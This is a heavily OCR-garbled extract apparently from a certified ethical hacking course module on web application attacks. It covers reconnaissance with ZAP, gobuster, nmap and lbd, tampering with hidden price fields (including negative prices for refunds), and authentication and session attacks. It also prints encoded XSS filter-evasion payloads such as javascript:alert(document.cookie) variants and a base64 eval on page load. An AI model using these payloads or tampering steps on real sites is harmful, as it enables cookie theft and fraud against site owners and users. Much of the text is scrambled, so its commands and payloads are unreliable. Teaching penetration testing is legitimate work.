ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing fordiscovering
methodsare employed the hidden
content
+
Webspidering/Crawling
Webspiders/crawlers
automaticallydiscoverthe hiddencontent and functionality
by
parsingHTMLformsandclient-side
JavaScript
requests andresponses,
ZedAttackProxy
‘OWASP
Source:https://www.owasp.org
ZedAttackProxy(ZAP)
‘OWASP is an integrated
penetration tool for finding
testing
vulnerabilities It offersautomated
i n web applications. s canners as well as a set of
toolsthat allowyou to find securityvulnerabilitiesmanually,
Attackersuse OWASP
ZAPfor web spidering/crawling to identifyhiddencontent andfunctionality
i n the
targetwebapplication

3)Bepor.
Fle. MewAnse Tes ingot. Ge te,
Sendedveie Soon ase
+] |=
r ave
2

[lesen [pnauksinna [newer [+

AutomatedScan
QQ)
be youot have
Fae
been amare that sald that you
atackappeaten

untioatace —_[Ripuiwweimoncope
con)@Select.

trations
sider Ue

= mek

ool? |5 PRS]| sper

vestery seen
acne
sen
of
any
sect
eresctng
be
piyed
oot |B
Ful eat
|]
wl

iver
most
1foxsrame
options
eae
No heaed
ereievaneine
hury
MAC
5d (Unsure(3)
Signature
S e (3) Ser

+
Hens Ming 6)
excentert-typeoptens

ae Goretseans
RP TP ho

of OWASPZAP
18.46:Sereenshot
Figure
Go Go Do 0 Go Wo Ao wo

‘Some webspidering/crawling
additional toolsare as follows:
Suite(https://portswigger.net)
Burp
© (https://www.owasp.org)
WebScarab

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MozendaWebAgent (https://www.mozenda.com)
Builder
(https://www.octoparse.com)
Octoparse
GiantWebCrawl(http://80legs.com)
*
Spidering
Attacker-Directed
Theattackeraccessesall of the application's functionality
anduses an intercepting
proxy to monitor all requestsand responses.The intercepting
proxy parses all of the
application’s
responses andreportsthecontentandfunctionalityit discovers.
Attacker-directedspideringtools
©
OWASP
DetectLoadBalancers
(https://www.owasp.org)
ZedAttackProxy

Organizationsuse loadbalancersto distributetheir web server loadacross multiple

servers and
thus increase the productivity
and reliability of web applications. In general,
there are two
typesof load balancers,namely DNS load balancers(layer 4 load balancers)
and HTTP load
balancers (layer 7 loadbalancers).Attackers u se various toolssuchas dig,loadbalancing
detector(Iba), andHalberd,
to detectloadbalancers ofthe target along
organization with their
realIPaddresses. Forexample,if a singlehostresolvesto multiple thenattackers
IPaddresses,
can determinethat the targetorganization
is using loadbalancers.

Using hostcommand
Typethe following
hostcommand the targetdomainis resolving
to determinewhether
to multiple
IPaddresses:
host <target domain>

address 98.138.219.231
address
addr
addres
addres
S
IPVE address 4998:58
TPv6 address ec
1PV6 address 4998
5
IPV6 address 2001:4998:44
TPv6 address 2001:4998
1Pv6 address 2001:4998:44
mail
mail
mail
is

is
1
is handled by

handled by 1
mta7.an0
mtaS ano
handled by 1 mta6.ano

14.47:
Figure Screenshot
showingoutpt ofhostcommand

ical andCountermensores ©
Mackin by E-Comel
Copyright
Usingdigcommand
The digcommandprovides
more detailedresultsthan the host command, Type
the
following
digcommandto determinewhetherthe targetdomainis resolving
to multiple
IPaddresses:
dig <target domain>

Figure
1448: showing utputof digcommand
Screenshot
loadbalancing
Using detector(Ibd)
Source:https://github.com
Ibd(load
balancing detectsif a given domainuses DNSand/orHTTPload
detector)
balancing
via Server:and Date:headerand diffs betweenserver answers. It analyzes
datareceivedfromapplication
responsesto detectloadbalancers.
the following
Type command ofthe targetwebapplication:
to detectloadbalancers
lbd <target domain>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Halberd
Using
14.49:
Figure
showing
the
Screenshot
output ofbd 00

Source:https://github.com
You can use Halberdto identify the real IP addressof load balancers. When
implement
organizations load balancers, their realIP addressis hiddenbehinda virtual
IP address.Oncethe attackersdetermine that the targetorganization is usingload
balancers,theytry to identify
the real IPaddressof the loadbalancers. Halberdcan be
usedto discoverHTTPloadbalancers andtheirIPaddresses.
the following
Type to identify
command of theloadbalancers
the realIPaddress
halberd <target domain>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 qkéd
print: 17d0:
[eeeesenees

1850:Screenshot
Figure showing
the outputof Halberd
ool
After identifying behindthe load balancers,
the real IP addresses attackersperform
further
attackso n the target
organization.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Web Applications
Analyze EH
© Analye
the
active
"omtty EntryPoints
functionality
appicatin’ andtechnologes
to identity attacks urfaces
exposed

‘entity
Web Application
j

te atc
surtces
eared ent vrus the soplestrs anther
oct

Examine
URL,
Header,
HTTP
POST
data,
to
querystingparameters, andcookies determine lds
alluserinput

Host
denty HTTPheader thatcan beprocessed bytheapplication
parameters 2 ier inputssuchas
User-Agent,
Referer
Accept,
Accept and
Language, headers

DetermineURLencoding andother
techniques encryption
mesures forsecure webtraffic
implemented

‘Tools
used

1 Ase
Zod
roe
ance tpe/nomosars| tet Ntpe//amonne gee

Module4 1826
Page ical andCountermensores
Mackin Copyright E-Comel
©
by
 WebApplications:
Analyze IdentifyServer-Side Technologies

WebApplications:
‘Analyze Server-SideFunctionality CEH
Identify
‘GRUWae

a
: =

Module4 1825
Page tical andCountermensores
Making by Comet
Copyright©
 WebApplications:
Analyze FilesandDirectories
Identify

Aiectores nd l e fhe websppestion

hosted
on the

WebApplications:
Analyze WebApplication
Identify
Vulnerabilities

ScanScanning
Tools
WebApplication
Vlnrbity Ontos Pte fap com

Module4 1826
Page tical andCountermensores
Making by Comet
Copyright©
 Web Applications:
Analyze CEH
Mapthe AttackSurface

Cureton
nein
tah tek
| At atentton on sae tun, or

snd
‘upnd omental
omiton
ates rote

amide
even
cote,ert
dracon, ese con ter

Senin ste
‘oem
eatin
SeninWisin SeninPaton ais

Analyze Web Applications

haveattempted
Onceattackers various possible
attackso n a vulnerable
webserver, theymay
turn their attention to the web applicationitself.To hackthe web application,first,theymay
needto analyze it to determine
i ts vulnerableareas. Even if it hasonly
a singlevulnerability,
attackerstry to compromiseits security bylaunching an appropriate attack.This section
describes i n a webapplication
howattackersfind vulnerabilities andexploit them,
needto analyze
Attackers target applications
web to determine
their Doing
vulnerabilities. so
helps
themreducethe “attack To analyze
surface.― a web application,
attackersacquire basic
knowledge
ofthewebapplication. Then,theycan analyze theactive application's
functionality
andtechnologies
to identify
any exposed attacksurfaces.
+
EntryPoints for User Input:Thefirst stepi n analyzing
Identify a web applicationis to
checkfor the application
entrypoint,whichcan later serve as a gatewayfor attacks.
Oneof the entrypointsincludesthe front-endweb applicationthat intercepts
HTTP
requests. Otherwebapplication provided
entrypointsare user interfaces bywebpages,
provided
service interfaces byweb services,servicedcomponents,and .NETRemoting
components.
HTTPrequestto identify
Attackersshouldreview the generated the user inputentry
points
IdentifyServer-Side Technologies: technologies
Server-side or server-sidescripting
systemsare usedto generate dynamic
web pagesrequested
byclients,and theyare
storedinternally
on the server. Theserver allowsthe runningof interactive web pages
corwebsites
o n webbrowsers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Commonly usedserver-sidetechnologies
includeActiveServerPages(ASP),
ASP.NET,
ColdFusion, (JSP),
JavaServer Pages PHP,
Python,andRuby o n Rails.

Attackerscan fingerprint
the technologies
active o n the server usingvarious fingerprint
techniquessuchas HTTPfingerprinting,
IdentifyServer-SideFunctionality: functionality
Server-side refersto the abilityof a
server to execute programs
on outputwebpages.Userrequests
stimulatethe scripts
residing
on the web server to displayinteractive web pages or websites.The server
executesserver-side
scripts,whichare invisible
to theuser.
Attackers shouldevaluatethe server-side structure and functionality
by keenly
observingthe applications
revealedto theclient,
IdentifyFiles and Directories: Web servers host web applications,
and
misconfigurationswhile hosting theseweb applications
mayleadto exposureof critical
files anddirectoriesover the Internet. Attackersidentify web application's
the target
filesand directoriesexposed
on the Internet usingvarious automatedtoolssuchas
attackersgather
Gobuster.Suchinformationfurther helps sensitive informationstored
in the filesandfolders.

Identify
WebApplication
Vulnerabilities:Webapplications
are developed usingvarious
technologies
and platforms.
Not following i n the development
practices
secure coding
of web applications
mayleaveflawsthat can be exploited
to perform various typesof
attacks
theAttackSurface:
‘Map Attackers thenmap theattacksurface of thewebapplication
to targetspecific
vulnerableareas. Theyidentify
the various attacksurfaces
uncovered
bythe applications
as wellas thevulnerabilities
associated
with them,
Identify
EntryPointsforUserInput
Webapplication inputgateshelpattackerslaunchvarious typesof injectionattackson the
application. If such inputgatesare vulnerableto attacks, gainingaccess to the applicationis
easy.Thus, during web applicationanalysis,attackerstryto identify
entrypointsfor user input
so that theycan understandhow the web application accepts or handlesthe user input.
Attackersexamine the URL,HTTPheader, query stringparameters, POST data,andcookiesto
determineall the user inputfields.They also identifyHTTP headerparameters that can be
processed bythe application as user inputs,suchas User-Agent, Referer, Accept,Accept-
Language, and Host. Furthermore, theydetermineURL encoding techniques and other
encryption measuresimplemented to secure webtraffic,suchas SSL.Then, theycan findthe
vulnerabilitiespresenti n the inputmechanism and exploit them to gain access to the web
application
Usethe followingtoolsto analyze
the webapplication:
=
Burp Suite(https://portswigger.net)
=
(https://www.owasp.org)
WebScarab
=
(https://www.owasp.org)
OWASPZedAttackProxy

ical andCountermensores
Mackin ©by E-Comel
Copyright
 (hetps://www.net-square.com)
httprint
Identify Technologies
Server-Side
Performdetailed
codeto identify server
fingerprinting
andanalyze
the HTTPheadersandHTMLsource
technologies
server-side
Examine directories,
URLsfor file extensions, andotheridentificationinformation
Examinethe error pagemessages
Examine session tokens: JSESSIONID Java, ASPSESSIONID IS server,
~ -

[ASP.NET_Sessionld ASP.NET,
~

PHPSESSID PHP ~

Usetoolssuchas httprint
andWhatWebto identify technologies
server-side

Server
Error
Could
find not
in

thepermission
'/ReportServer’
Application
set namedASP.Net

recition the
Description:
Anunhandedexception duringthe
occurred
ofthe currentwebrequest Pease review stack

the
code
trace formoreinforms
originatedin

Net
ersion
ion: Microsoft
40,30339.1
Framework

ttprint
Screenshot
displaying
FIGURE
1451: error mess

Source:https://www.net-square.com

httprintis a webserver fingerprinting

toolthat relieson webserver characteristics
to
accurately
identifyweb servers, even though
theymay have been obfuscatedby
changing
the server bannerstringsor byplug-ins
suchas mod_security
or server mask.
httprintcan alsobe usedto detectweb-enableddevicesthat do not have a server
bannerstring,suchas wirelessa ccess points,routers,switches,cablemodems, and
httprint
uses text signature andit is very easyto addsignatures
strings, to the signature
database.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1452:Screenshotofteint
Figure
WhatWeb
Source:https://github.com
WhatWebscans and iderntifiesweb technologies,
including
content management
systems blogging
(CMS), platforms, packages,
statistic/analytics JavaScriptlibraries,
web
servers, and embeddeddevices.WhatWebhas over 1800 plugins,eachof which
recognizessomething
different. WhatWebalso identifies version numbers,
email
addresses, webframework
account IDs, modules,
SQLerrors, andmore.

ical
Mackin
and Copyright
©
by
E-Come
Countermensores
Identify Functionality
Server-Side
showing
14.53Screenshot
Figure ofWhatWeb
output

After determining
the server-sidetechnologies,
attackerstry to identify the server-side
functionality
educated
to find potential

guesses the
to determine theofweb
vulnerabilities.They
functionality
examine
internalstructure and
page source andURLsandmake
applications.
They the following
use toolsto do so.
=
GNUWeet
Source:https://www.gnu.org
GNUWgetis employed for retrievingfilesusingHTTP,HTTPS, andFTP,whichare the
most
‘can
widely
usedInternet protocols.
cron jobs,
becalledfrom scripts, andterminalswithoutX-Windows
tool;hence,
It is @non-interactive command-line
support,
it

ical andCountermensores
Mackin ©by E-Comel
Copyright
 14.54Screenshot
Figure GNUWet commandline
displaying tity tool

(http://softbytelabs.com)
BlackWidow
Pro(http://www.
Teleport tenmax.com)
ExamineURL
SSLcertified
‘An pageURLstarts with https insteadof http.
if a pagecontains a aspx
extension, the application
is likelywritten using ASP.NET.If the query string has a
parameter named
andwill display
showBy,then youcan
the databythatvalue
assume
that
application
the
a is using database

Identify
Figure
14.5:Identity
FilesandDirectories
Sie
Server FunctionalbyexaminingU RL

Attackersuse various techniques

andtoolsto enumerate applications,hiddendirectories, and
filesoftheweb application on the Internet.They
hostedon web servers that are exposed u se

toolsGobuster
FuzzerNSE
suchas
script and URL andthe Nmap
directoriesofthe targetweb application.
http-enum to identify
filesand

ical andCountermensores
Mackin ©by E-Comel
Copyright
Gobuster
Source:https://github.com
Gobusteris a Go-programming-based directory to perform
scanner that allowsattackers
fast-pacedenumeration ofhiddenfilesanddirectoriesofa targetwebapplication.
Itis a
command-oriented tool usedto brute-forceURIsi n websites,DNSsubdomains, names
ofvirtualhostson thetargetserver, ete.
Runthe followingcommand to retrieve fileanddirectory
namesandtheirstatuscodes:
gobuster-u <target URL> -w common. txt

Figure showing
1456:Screenshot theoutout of Gobuste
Usethe-I flagto retrieve the length
of the body
along
with filesanddirectories:
gobuster -u <target URL> -w common. txt -1

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Intpasswd (Status; 403) [size 410]
Intnccess (Status, 403) [size: 410]

1857:Screenshot
Figure theoutput of Gobuster
showing tool
Usethe -s flagto retrieve filesanddirectoriesrelatedto specific
statuscodes:
gobuster -u <target URL> -w
common.
txt -s 200

1858:Screenshot
Figure theoutput of Gobuster
showing tool
Similarly,
the -q and-n flagsc an provide
a quick view of the directories withoutbanner
andstatus
codes.
You can alsooutputthe resultto a n outputfile usingthe flag.
-o
Module4 Page1834 ical andCountermensores
Mackin
© by E-Comel
Copyright
Nmap
Source:https://nmap.org
Attackersuse the Nmap NSEscripthttp-enum to enumerate ajplications,directories

security that
int are
andfilesof webservers
he
target
vulnerabilities
exposed on the Internet.Thus,t hey
webapplication,
c an identify
critical

following
Run the gather
Nmap commandto informationaboutthe exposed
filesand
directoriesofthe targetweb server:
nmap -sV --script=http-enum<target domain or IP. address>

ical andCountermensores
Mackin ©by E-Comel
Copyright
Identify
WebApplication
Vulnerabilities
Attackersusevarious techniques to detectvulnerabilitiesin targetweb applications hostedon
‘web
servers to gain administrator-level
access to the server or retrieve sensitive information
storedon the server. They s can applicationsfor identifyingvulnerabilitiesand detectattack
surfaceso n the targetapplications. Performing comprehensive vulnerability scanningcan
disclosesecurityflawsassociated with executables, binaries, and technologies usedin a web
application.Through scanning,attackerscan alsocatalog
vulnerability differentvulnerabilities,
prioritizethem basedon their threatlevels, anduse themwhile targetinga n application
Attackerscan use toolssuchas Vega, WPScan VulnerabilityDatabase, Arachni,andUniscanto
identify
=
inthe
vulnerabilities
Vega
targetwebapplications.

Source:https://www.subgraph.com
Vega is a free andopen-source web securityscanner andweb security testingplatform
for testingthe security of webapplications. Vegahelps you to find andvalidateSQL
injection, cross-sitescripting (XSS), inadvertentlydisclosedsensitive information, and
other vulnerabilities.It is written in Javaand is GUL-based, and it runs on Linux,OSX,
and Windows.Vega also helps you to find vulnerabilitiessuchas reflectedcross-site
scripting, stored cross-site scripting, blind SQLinjection,remote file include, shell
and TLS/SSL
security
the TLS settings
injection, others.It alsoprobes
forimprovingsecurity
of your servers.
andidentifiesopportunities

1461:Seeenshotof Vegs
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional scanningtoolsare as follows:
webapplication
=

=
Vulnerability
WeScan
Database
(https://wpvulndb.com)
Arachni(https://www.arachni-scanner.com)
*
appspider
(https://www.rapid7.com)
*Uniscan(https://sourceforge.net)
Mapthe AttackSurface
Oncethe attackersdetectthe entrypoints,server-side technologies,and functionalities,
they
vulnerabilities
can find their respective andmapthe attack surface a rea of the targetweb
application.
Webapplication analysisthushelps attackersreducetheirattacksurface.Attackers
consider
the
following
factors i n planning
their attack.

Information
Client-SideValidation Injection
Attack
Attack,Authentication
Attack
DatabaseInteraction SQL Injection,DataLeakage
FileUpload
andDownload DirectoryTraversal

of
DisplayUser-Supplied
Redirects
Dynamic
Data Scripting
Cross-Site
Redirection,
HeaderInjection

Login
Session
State
Password
UsernameEnumeration,
Hijacking,
Session SessionFixation
Brute-Force

Attack
Injection Escalation,
Privilege Access
Controls
CleartextCommunication
ErrorMessage
Data
Theft,
Session
Hijacking
Leakage
Information
EmailInteraction EmailInjection
Application
Code Buffer Overflows
Third-Party
Application Exploitation
KnownVulnerabilities
WebServerSoftware KnownVulnerabilitiesExploitation
Table
showing
142:Table information
andrespective
attacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 j
Client-sideControls
Bypass EH
(©.
Aweb application
ant implement
components preven
measuresaffecting
contol data
wth
requires clen-side
cntol to
that
ser
use’
from
inputs
interaction hisor he
transmission
own cent
via clent

‘thi often
sumptionean makeappiations by
|@Webdevelopers think thatthedatatansmited
fromthecent to server
vulnerableto various stacks
is under
contol theuser, ne

evtorm
sure
coe
review beby een wineries athecade hat canna ete

©
vado X55Fits |
HTML fades ers characters
bynectingunarul the oe

7
Client-side
Bypass Controls: (CEH AttackHidden FormFields

Inany e-commerce/retaing
web aplication,
thedevelopefagscertainl d ke productname, andproduct
price hidden theuse fromviewing
to prevent a ndmodiying
theWelds

In
elent
very session, use hidden
developers fds to store een information,
inline pricesand
product

a HTML
page,
T oexpat

by and into
such valneablewebapplications,
save thesourcecode forthe tamperthe pice values
thepricefile's vale,
edting reload thesource browse.
TheBuyb utton canthenbeclickedto

Youcan
get
alsoattemptt o provide
negative
values
i nthe picefd to a refund
fromhe applation

Module4 1838
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 j
Bypass
Client-side Controls:Attack BrowserExtensions
CEH
18 datafroma webapplication
Capturing thatues
browser
extension can beachieved
components bytwo methods

Intercepting
Traffic from Decompiling
Browser

component
and modty
tempt to intercept
bythe as wellas requests
esponses
made
rom the
1 ines tecniqu,youcan
component's
thecomponent
attemptto decompile
to view ts detaled
bytecode
functenaty
the
source,

Usetools
i keBurp
Suit to capture
thedata

modify
data
‘employed
Yeu to ntherequest
present
t o obfuscate
thatare
thetransmitted
or encrypt

]
Client-side Controls:Perform SourceCode Review
Bypass CEH

|©Examinethe webapplication theworking

source code andunderstand of components
inthe

ofthe
thefllowingfuncionalties components
codeto identify

@ cies ryt stn Employed

con transmitted
data
techlques
obtsctionor encryption

‘Mosiiabie withhidden
components cent side

Module4 1829
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 Client-sideControls:EvadeXSSFilters
Bypass

(©Many
Embedding
Encoding
Characters

haractersin |)
HTML
Tage (@Usetadscestoevade
Whitespaces
detection:
Manipulating
@ Youcanembeda
scot tag

<iem
fan bewrten i n ASCcode vet sr
fade ters thatsare for sings roa cee
<ececeeript>iptodocunant
we

sapere ASE!) cfecrencriptosp>

12Youcanato encode th
thl0e:aeascriptsatert(X88

iesetcle>
eens at
SE Sahin an HTML
c ement

Lie
hexadecima
encoding to Soraret
seastuosaeripe
cucceaeeat Xe5") >
jog" eoloate
<inglarew"pepep.

aah mene
newline
characters:
chracant
ype {etn and
selena

BypassClient-side Controls
application
‘Aweb requiresclient-side
controls whentransmitting
to restrict user inputs datavia
clientcomponents and implementing measuresto controltheuser'sinteraction with hisor her
own client.A developer uses techniques suchas hiddenHTML form fields,andbrowser
extensionsto allowthe transmissionof datato the server via theclient.Often,
web developers
assumethatthedatatransmitted fromtheclientto the server is withinthe user's
control,and
thisassumption can makethe application
vulnerableto various attacks.
Someof the techniques
to bypass
theclient-sidecontrolsare as follows:
‘Attack
HiddenForm Fields:Identify
the tagsandfieldsto exploit
hidden
theweb pagebefore form
fields
on
the webpageandmanipulate
the datato the server.
transmitting
Attack BrowserExtensions:Attemptto interceptthe traffic from the browser
extensionsor decompile
thebrowser u ser data
extensionsto capture
Perform
SourceCodeReview:Perform
source codereview to identify
vulnerabilitiesi n

+
the code
thatbe by
traditional
vulnerability
tools,
cannot identified
EvadeXSSFilters:EvadeXSSfiltersbyinjecting
unusualcharacters
into the HTML code.
scanning

‘Attack
HiddenFormFields
E-commerce/retailing web applicationsuse hiddenHTMLformfieldsto restrict the user to
view,/modify datafieldssuchas “products―
and“prices
of products―
andallowthe user to enter
certain fieldssuchas “quantity,―
assuming that the user enters the required
quantitybefore
from modifying
Information,
the
submitting datato the server. Thedeveloper
them. In every clientsession, developers
including
product
pricesanddiscountrates.
flags
these
as to
fields hidden restrict the user
use hiddenfieldsto store client

ical andCountermensores
Mackin ©by E-Comel
Copyright
Followtheprocess
described
belowto attackhiddenformfields:
=
Identify
vulnerablewebapplications
=

Save
Locate
the source codefor the HTMLpage

thefield hidden

Tamper
‘=

Savethe values
by
editing
source field’s
withtheprice
file andreloadthe
theprice
into a browser
value

Click

Buy the button

Therequestwill be transmittedto the server with the modifiedprice. Youcan alsouse proxy

toolssuchas Burp
any value. In addition,
applicationrefunding
into
the modify
Suiteto trapthe request thatsubmits formand the pricefieldto
you can attemptto enter negativeprice valuesto trick the retail
through
theamount creditcardtransactions.
‘Attack
BrowserExtensions
Thedatafrom a web application can be captured
that uses browserextension components by
methods:
‘two
‘=
TrafficfromBrowserExtensions
_Intercepting
Attempt intercept
to and modify
the request
and responseof the component
andthe
server, respectively.
You can use tools suchas BurpSuite to capturethe data.This
methodhascertain limitationssuchas dataobfuscationor encryption,
and secure data
serialization.
Decompiling
BrowserExtensions
Using this technique,you can attemptto decompile the component's bytecode to view
its detailed source, which allows you to identify the detailed informationof the
component functionality.
Themain advantage ofthistechnique is that it allowsyou to
modifydata presenti n the requests that are sent to the server, regardless of any
‘obfuscation
or encryptionmechanisms employed forthetransmitted data.
You can use proxy tools suchas BurpSulte to captureand modify the web page
componentrequests. In the context of bypassing client-sideinputvalidationthat is
implemented in a browserextension,i f the component submitsthe validateddata to
the server transparently,this data can be modifiedusingan intercepting proxy i n the
samewayasthat described forHTMLformdata,
PerformSourceCodeReview
Attemptto acquire the source codeof the targetweb application. After acquiring the source
code,examine the codeto understand the components, frameworks, etc., as well as their
workingto identify any existingvulnerabilitiesi n the code.This examination can provide
informationabout various functionalities suchas removing client-side input validation,
submitting
nonstandard datato the server, manipulating client-sidestatesor events, or directly
invoking functionality that is present
withinthe component,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Performsource codereview to identifythefollowingfunctionalities
of a targetcomponent
Client-side inputvalidationor other security-relatedlogics
andevents
=
Obfuscationor encryption techniques that are appliedto the clientdata before it is

=
to
the
transmitted server
Modifiablecomponents with hiddenclient-sidefunctionalities
=

XSS
Evade
to
References server-side
Filters
functionalities

implementations
XSSfilter applied are to webbrowsersto protectthemfrom imminent XSS
attacks;however,attackerscan makethemvulnerablebyinjecting unusualcharacters into the

HTML
code,
through
Attackers
filter
implementations.
whichtheycan evadethe
application
can embedharmfulJavaScript into a web i n manyways.However, the
latestbrowsersare implemented with strongsecurity measures; hence, the scriptinjection
sometimesfails.Therefore,
attackersoftentryto not only
takeadvantage ofapplication design
flawsbut alsobypassinputevaluationprocessesconductedbythe server or applicationto trick
complicatedbrowser
filters.
exploit
XSSattacksusually improperconfigurations implementations
andsecurity ofa browser,
filter bypassing
‘whereas methodsare carriedout byleveraging
flawsi n a server or browser-side
filters, certain versions or products.
targeting
‘A
majorityportionof the browsercodeis written with proper security m easures to handle
abnormalHTML,JavaScript, and CSSto fix them before delivery to the end users. XSSfilter
bypassing
leveragessuchan intricate compositionof specifications,
exceptions,languages, and
otherbrowsercharacteristics scripts
to inject throughthefilterswithout leavinga trace.

techniques
VariousXSSfilter evasion are discussedbelow:
Inserting tagsinto thecodeis not allowedi n a general
<script> context. However,
some other
HTMLtagscan permittheseunusualinjections. Eventhandlersare employed to run specific
scriptscorrespondingto the authorizeduser actions. In general,event handlers suchas
<onfocus>, c an be exploited
<onerror>, and<onclick> to evadeXSS
filters.
=
Encoding
Characters
‘Attackers
can embedvarious charactersi n differentwaysto evade filtersthat focuson
text to detectunwantedstrings.
inspecting Approaches for characterencoding include
the
following:
fewor
‘A all ofthe characters
of HTMLelements c an bewritten usingASCIIcodesto
evadefiltersthat searchfor strings
suchas <javascript>

Hexadecimal
(‘KSS
">
<a href= "¢#106;avascript:alert

encodingcan be usedto bypass

Successful’) Click Here!</a>
filtersthat searchfor HTMLelements
by for
&along
scanning
<a
with
numeric
characters:
(document
href="G#6A;avascript:alert Click Here!</a>
.cockie)―>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Base64encoding can beusedto cover thetracks ofattackcode;it popsup an alert
with “Successful
XSS―

))">
<body onload="eval (atob ( U3Vj¥2Vze2Z1bCBYUIM="
The embeddedcharacterelementsare from numbers1-7, avoiding initial zeros.
of
Therefore,anycomposition zero padding

(‘Successfu
is allowed:
<a href=" 6x6A;avascripts#000005860000097Lert
Click Here!</a>
XSS’)">

XSSpayloads can be concealedusingcharactercodes:

<iframe sre:

onnouseclickzalert
Embedding
(String.
fromCharCode
(88,83,83))></ifz
Whitespaces
whitespace
Browsers allow convenient usageof characterswhile writing
JavaScript
or
HTML code. Thus,attackerscan easilyevade filters by insertingnon-printable
characters.
0 Tabspacesare avoidedwhileprocessing theycan be invokedto split
the code;
keywords.
Consider
this
<img>
tag:
<img src="java__script:al ert (‘Successful xss’)">
Youcan alsoencodethetabspaces:
<ing sre="javacix09;seript:al64x09;ert (‘Successful xSs’)
">

Similarly,
carriage return and newline characters
are not consideredduring
thus,attackerscan alsoencodethesecharacters
processing; in between:
<a href ="javefx0asa
Script: 6#x0A;ales#x0Drt; (‘Successful
XSS')">VAsit xy2.come/a>
‘Manipulating
Tags
XSSfilterevasion can alsobeperformed tagsandskipping
bymanipulating attributes.
© the scriptanddeletescertain tags(mostly
Whenthe filter inspects <script»),placing
themwithinothertags can leavelegitimate
codeafterthey a re deleted

<ser<ecript>ipt>document
.write
Attributesand tagscan be separated
("Successful SS")</ser<seript>ipt>
bysupplying a slashthat helps i n bypassing
restrictions i n valueinsertion:
whitespace
<ing/sec="popup.
2xss"))>
jpg―
also exploit
‘Attackers
onload=4ix6A
:eval fuls#3
;avascript

browserinterpretations
(alert ( ‘Success

and abnormaltaginputsto bypass

filters.Thefollowing
example
showshow to skip the <href>tag
<a onmousedown=alert
(document
.cookie)> visit xyz.com/a>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AttackAuthenticationMechanism

(8. Calotdesign and ilementationflaws i n web applications

sucha failureto checkpasword
strength
to bypass
forinsecutetransisuonof credentals, authentication
mechanisms

feo teste chan

CookieExploitation Bypass
Authentication

Sor -
]
and Implementation
Design Flaws in AuthenticationMechanism CEH
bse
BB rassorts EE veerimpennstion

EB erste Force
togin

Verbose
Fale Messages
Improper Vaan

Predictable
ofCedentis

Usernames
andPasswords

DD tannin
secure

Ls]Paseword
ofredentit

ResetMechanism
Insecure
of Distribton Credentials

Fall-open M echanism
Login

Ls]
Remember
M e" Functionality
Insecure
Storage ofCredentials

ical andCountermensores
Mackin ©by E-Comel
Copyright
 UsernameEnumeration

singthetlaband-erormethod

1 somespltions avi
-Mtacirs
an determine generate
aconora
thesequence seqvenc
vurramesbeowd
vals eerames
ans enumerate
(ewer, oer) rd

PasswordAttacks:PasswordFunctionality
Exploits
Changing
Password

Tyran
fr Pasword,New
sting ‘ld
New
Paseword and Canimthe
Rls to Pew an nae eos ety

Password
Recovery
‘Remember
Me’
Expl

Module4 1845
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 PasswordAttacks:PasswordGuessing
and Brute-forcing
Pastword Guessing Bretesorcing

td oot
25
such THC S ue,
Mpa,Burp Ltr

Stops
to perform
password
reset poisoningattack:

Module4 1846
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 |
SessionAttacks:SessionID Prediction/Brute-forcing C/E

(Osoof
th
‘esis cptaredsendon detent sexton genrton
proces
vc the aon wr,

Cookie Poisoning
Cookie Exploitation:

|G the
cookie
contains
passwords oF

as
sestionidentifiers,
steal
thecootle
Usingtechniquessuch sept
Injection
and eavesdropping

pasword
sé

Module4 1847
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 Authentication:Bypass
Bypass SAML-basedSSO
CEH
1 (50)
Single
Sign-on authentication

‘tsson to acess multi

‘Bases
encoding canbe
and easy

aie to bypass
SAWbasedS30

Attack Authentication Mechanism

In general,
webapplications users through
authenticate authentication
mechanisms
suchas
loginfunctionality.Ouring
web applicationanalysis, attackerstry to find authentication
vulnerabilities
suchas weakpasswords (e.g.,
short or blank,common dictionary wordsor
names, defaults).
names,user’s Attackersexploit
thesevulnerabilitiesto gain access to the web
application
bynetworkeavesdropping, brute-force
attacks, dictionary attacks, cookiereplay
attacks,
credentialtheft,etc.
Most authenticationmechanisms used byweb applications have design flaws.Attackerscan
identifytheseflawsandexploit themto gainunauthorizedaccessto thewebapplication. Such
design flawsincludefailure to checkpasswordstrength,insecure transmission of credentials
over the Internet,etc. Webapplications usually
authenticate their clientsor users bya

of
combination a username and
=
Username Enumeration
password,
which and
can beidentified exploited.

‘Attackers
can enumerate usernames in two ways: verbosefailure messages
and
predictableusernames.
© VerboseFailureMessage

login
In a typical the user
system, enters two fields,
namely username andpassword
In some cases,an application
will askforadditional information. If the user is trying
to login and fails,it implies
that at least one field was incorrect. Thisprovides

for
an to the
grounds attackerexploit application.
Examples:
*

Account
not <username> found

ical andCountermensores
Mackin ©by E-Comel
Copyright
 * provided
Incorrect password
*
Account
has
Predictable
been
locked
out
<username>
Usernames
applications
‘Some automatically
generate account usernames according
to some
predictable
sequence. Thismakesit very easy for the attackerto discernthe

for
a
sequencepotentially
Password
Attacks
all
exhaustivelistof valid usernames,

A password attack is a process of tryingvarious password

crackingtechniques to
discovera user account password bywhich the attackercan gain access to an
application,
Methodsinclude
©
following:
for cracking
passwords
functionality
Password exploits
the

©
guessing
Password

Brute-force
© attack
Dictionary attack
Attack password
reset mechanism

Attacks
Session
Thefollowing
mechanisms of
types sessionattacksare employed
byattackers authentication
against

©.Session
to
prediction:It
bypass session
focuses
values
that
allow
on predicting
the authenticationmechanismof
understanding
attacker
predict
the session ID generation
an
ID
application.
process,the attackercan
the
Byanalyzing
and
a valid

access
sessionIDvalueandgain
Sessionbrute-forcing:
to the application.
An attackerbrute-forcesthe session ID of a targetuser and
ittologinalegitimate
uses as
userand toapplication.modify
gainaccess the
